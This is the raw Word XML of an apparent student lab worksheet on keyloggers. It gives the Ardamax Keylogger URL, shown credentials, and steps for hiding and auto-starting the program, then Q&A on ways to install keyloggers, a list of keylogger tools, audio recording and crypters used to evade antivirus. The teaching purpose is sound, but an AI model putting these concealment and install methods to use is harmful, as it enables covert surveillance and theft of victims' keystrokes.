                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Ardamax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Keylogger</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="593199B7" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="00C57C3F" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId124" w:history="1">
              <w:r w:rsidR="001138A0" w:rsidRPr="001C411D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:bCs/>
                  <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
                </w:rPr>
                <w:t>https://www.ardamax.com/keylogger</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5EE2F94A"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Username: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>ardamax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="448276BB"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Password: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>ardamax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5C11BE85"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After install you can delete but it is working (can check in task manager or triangle yellow icon on taskbar)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC6E54F"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
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Open and view logs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C57DE3D"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eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">It works on everything notepad, start, online accounts </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="51F5C27F"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
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Hidden mode:</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> attacker can hide also (right click)- ctrl + H</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C33512F" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Invisibility option:</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> from task manager. It auto starts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001138A0" w:rsidRPr="001C411D" w14:paraId="260A80A8" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F2A3A48" w14:textId="1187B03C" w:rsidR="001138A0" w:rsidRDefault="001138A0" w:rsidP="00847AD0">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78F6E497" w14:textId="77777777" w:rsidR="00847AD0" w:rsidRPr="001C411D" w:rsidRDefault="00847AD0" w:rsidP="00847AD0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="420AD6AA" w14:textId="77777777" w:rsidR="001138A0" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>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Differentiate between software and hardware keyloggers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22B5C30C" w14:textId="77777777" w:rsidR="00503579" w:rsidRPr="00503579" w:rsidRDefault="00503579" w:rsidP="00503579">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00503579">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Software keyloggers are programs that are installed on the computer system, either intentionally or by stealth, and run in the background, capturing every keystroke made on the keyboard. The data collected by the software is then usually sent to a remote location for analysis or review. Software keyloggers can be installed remotely, making them a popular </w:t>
            </w:r>
            <w:r w:rsidRPr="00503579">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>choice for cybercriminals seeking to gain unauthorized access to a computer system or network.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3208691E" w14:textId="77777777" w:rsidR="00503579" w:rsidRPr="00503579" w:rsidRDefault="00503579" w:rsidP="00503579">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36B75588" w14:textId="07B581DD" w:rsidR="00503579" w:rsidRPr="00503579" w:rsidRDefault="00503579" w:rsidP="00503579">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00503579">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Hardware keyloggers, on the other hand, are physical devices that are inserted between the keyboard and the computer system. They are generally more difficult to detect than software keyloggers because they are not installed on the computer itself. Hardware keyloggers can be easily installed by physically plugging them in, and they do not require any special software to operate. They work by intercepting the signals that are sent from the keyboard to the computer and storing them in an internal memory. Some hardware keyloggers can also capture screenshots or record other types of data.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="760C1ED8" w14:textId="77777777" w:rsidR="00503579" w:rsidRPr="00503579" w:rsidRDefault="00503579" w:rsidP="00503579">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="34DA1100" w14:textId="77777777" w:rsidR="001138A0" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>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at are the different methods of installing a keylogger?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B3A87B5"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r w:rsidRPr="008228EE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>There are several methods of installing a keylogger, including:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F74EA5D"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p>
          <w:p w14:paraId="434FFA28"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r w:rsidRPr="008228EE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Physical access: An attacker may physically access the victim's computer and install a keylogger software or hardware device.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E3C9A7C"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p>
          <w:p w14:paraId="25FF6B9A"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r w:rsidRPr="008228EE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Email attachments: An attacker may send an email to the victim with an attachment that contains the keylogger. Once the attachment is downloaded and opened, the keylogger gets installed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52CFC3CB"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p>
          <w:p w14:paraId="07971C37"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r w:rsidRPr="008228EE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Software bundle: Some freeware or shareware software may come bundled with a keylogger. When the software is downloaded and installed, the keylogger also gets installed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B2218CF" w14:textId="77777777" w:rsidR="00134420"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p>
          <w:p w14:paraId="683A6EF2" w14:textId="761EAB31" w:rsidR="00442806" w:rsidRPr="008228EE" w:rsidRDefault="00134420" w:rsidP="008228EE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008228EE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Social engineering: An attacker may use social engineering tactics to trick the victim into installing the keylogger. For example, the attacker may send an email posing as a legitimate company and request the victim to download and install a software update. The update may actually be a keylogger.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B5AC934" w14:textId="77777777" w:rsidR="008228EE" w:rsidRPr="008228EE" w:rsidRDefault="008228EE" w:rsidP="008228EE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B69A9D1" w14:textId="75CD9179" w:rsidR="008228EE" w:rsidRDefault="008228EE" w:rsidP="008228EE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008228EE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Malware: Keyloggers can also be installed through malware infections, such as Trojans or viruses. The malware may be downloaded and installed by the user unknowingly or as a result of visiting a malicious website.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0521923C" w14:textId="77777777" w:rsidR="008228EE" w:rsidRPr="001C411D" w:rsidRDefault="008228EE" w:rsidP="00134420">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2CCAED4A" w14:textId="77777777" w:rsidR="001138A0" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>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List 5 open source keyloggers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C269B8" w14:textId="77777777" w:rsidR="00442806"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 xml:space="preserve">1 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00442806">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Spyrix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00442806">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Free Keylogger</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B5EA34A" w14:textId="77777777" w:rsidR="00442806"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 xml:space="preserve">2 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00442806">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Kidlnspector</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="78AB39DA" w14:textId="77777777" w:rsidR="00442806"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3 Actual Keylogger</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BD756A8" w14:textId="77777777" w:rsidR="00442806"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 xml:space="preserve">4 REFOG Free </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00442806">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Keyloger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6F244B9C" w14:textId="77777777" w:rsidR="00442806"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 xml:space="preserve">5 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00442806">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Iwantsoft</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00442806">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Free Keylogger</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5439AC79" w14:textId="5E75A50B" w:rsidR="00142699" w:rsidRPr="00442806" w:rsidRDefault="00442806" w:rsidP="00442806">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442806">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">6 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00442806">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>KidLogger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="155F0693" w14:textId="77777777" w:rsidR="003A4D3C" w:rsidRPr="001C411D" w:rsidRDefault="003A4D3C" w:rsidP="003A4D3C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E5FB699" w14:textId="273AD817" w:rsidR="00142699" w:rsidRDefault="001138A0" w:rsidP="00142699">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>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Can </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Ardamax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> keylogger record audio of a victim's machine?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B5F0006" w14:textId="4A47A841" w:rsidR="00142699" w:rsidRPr="00142699" w:rsidRDefault="00142699" w:rsidP="00142699">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00142699">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00142699">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Ardamax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00142699">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> keylogger has the capability to record audio from the victim's machine. It can record sound from the microphone and save it in an audio file on the attacker's computer. However, it's important to note that recording audio without the victim's knowledge and consent is illegal and unethical.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36FEF73D" w14:textId="77777777" w:rsidR="00142699" w:rsidRPr="001C411D" w:rsidRDefault="00142699" w:rsidP="00142699">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49232F2C" w14:textId="77777777" w:rsidR="00145C15" w:rsidRDefault="001138A0" w:rsidP="00145C15">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>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the use of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Crypter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> software?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EE799F7" w14:textId="7062ECF1" w:rsidR="003A4D3C" w:rsidRPr="003A4D3C" w:rsidRDefault="003A4D3C" w:rsidP="003A4D3C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A4D3C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Crypter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A4D3C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> software is used to encrypt and obfuscate malicious code such as viruses, Trojans, and keyloggers. It is typically used by attackers to evade detection by antivirus software and to make their malware more difficult to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A4D3C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>analyze</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A4D3C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
